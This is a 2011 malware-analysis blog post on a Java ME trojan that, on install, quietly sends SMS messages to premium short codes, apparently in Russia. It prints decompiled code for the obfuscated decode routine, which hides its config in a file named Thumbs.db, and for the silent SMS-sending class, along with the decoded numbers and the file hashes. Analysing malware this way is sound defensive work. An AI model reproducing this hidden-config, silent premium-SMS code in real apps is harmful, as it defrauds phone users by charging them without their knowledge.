Write once, cash everywhere
12, Sep, 2011We happened to bump into a fancy piece of malware which is probably targeted to Russian mobile subscribers.
While malware running on Android platform has rapidly become the most common malware threat for mobile,
Java ME is stiff going strong too. The malware in question has a Virustotal score of 6/42.
The malware is spread as a JAR package which contains the following files:
mmc.jar is the actual malware package and not part of the directory structure itself. The main business logic of
the malware is in file M.class. When decompiled, the run() method of the class starts like this:
public void run()
{
try
{
G.setFont(Font.getFont(0, 0, 0));
detect_platform();
decode();
If we then take a look at what method decode() does, we can see something interesting:
public void decode()
{
S.openres("/res/Thumbs.db");
error = S.readln();
S.closeres();
error = upCase(error);
line = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+-/| ";
j = 1;
a = 0;
i = 0;
sog = "";
for(; error.length() >= j; j++)
{
for(i = line.indexOf(String.valueOf(error.substring(j - 1, j))) - 1;
(((byte)(a > i ? -1 : 0))) != 0; i += 41);
i -= a;
a = i + a;
if((((byte)(j == 1 ? -1 : 0))) != 0)
i -= 4;
if((((byte)(i == 41 ? -1 : 0))) != 0)
i = 0;
sog = new String(sog + line.substring(i, i + 1));
}
error = loCase(sog);
sog = null;
count_query = 0;
for(i = 0; error.indexOf(String.valueOf('|'), i + 1) != -1;
i = error.indexOf(String.valueOf('|'), i + 1))
count_query++;
ms = new String[3][count_query + 1];
j = 1;
for(i = -1; error.indexOf(String.valueOf('|'), i + 1) != -1;
i = error.indexOf(String.valueOf('|'), i + 1))
{
ms[1][j] = error.substring(i + 1, error.indexOf(String.valueOf('/'), i + 1));
ms[2][j] = error.substring(error.indexOf(String.valueOf('/'), i + 1) + 1,
error.indexOf(String.valueOf('|'), i + 1));
j++;
}
}
We can see that decode() actually opens file Thumbs.db under directory called res. And interestingly,
Thumbs.db contains a string:
“/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD”
And what decode really does, is that it “decodes” the Thumbs.db and sets the result in ms[1][1] and ms[2][1].
Variable count_query will receive a value of 4 (int). And where is the ms array then used? Later in the code as
we can see code within the run() method of M.class:
if(f < count_query)
{
game = SM.send("sms://" + ms[1][b], ms[2][b]);
if(b == count_query)
b = 1;
else
b++;
}
And the contents of sm[1] and sm[2] will be:
7375, 88600168904
7202, 65510006691
1899, fteme 1283
8385, 88600168904
The relevant parts of the class SM are as follows:
public class SM
implements Runnable
{
public static int send(String s, String s1)
{
if(isSending)
{
return 0;
} else
{
new SM(s, s1);
return -1;
}
}
public SM(String s, String s1)
{
success = false;
isSending = true;
destination = s;
message = s1;
try
{
Thread thread = new Thread(this);
thread.start();
}
catch(Exception exception)
{
isSending = false;
}
}
public void run()
{
try
{
MessageConnection messageconnection =
(MessageConnection)Connector.open(destination);
TextMessage textmessage =
(TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText(message);
textmessage.setAddress(destination);
messageconnection.send(textmessage);
messageconnection.close();
isSending = false;
success = true;
return;
}
SM.class will basically send an SMS message to a Common Short Code number (SMS premium number) passed in
ms[1], with a content passed in ms[2]. So what happens when the JAR is installed and run? It will send SMSs to
the numbers below, with the content mentioned below and exit.
Number Content
7375 88600168904
7202 65510006691
1899 fteme 1283
8385 88600168904
Based on a quick googling, at least 7375 seems to be a premium number in Russia.
The .jar package has the following hash results:
MD5 : b5a56e8a442ac8c81bee612c1fcbcf41
SHA1 : da13a4b16d00c30b153012c39772633d7948982e
SHA256: 8eb735db14e83ceeff9fa15965d40b27822ab513e5f5053b517aaf3c7afbbbb3
- Posted by admin in in General Information Security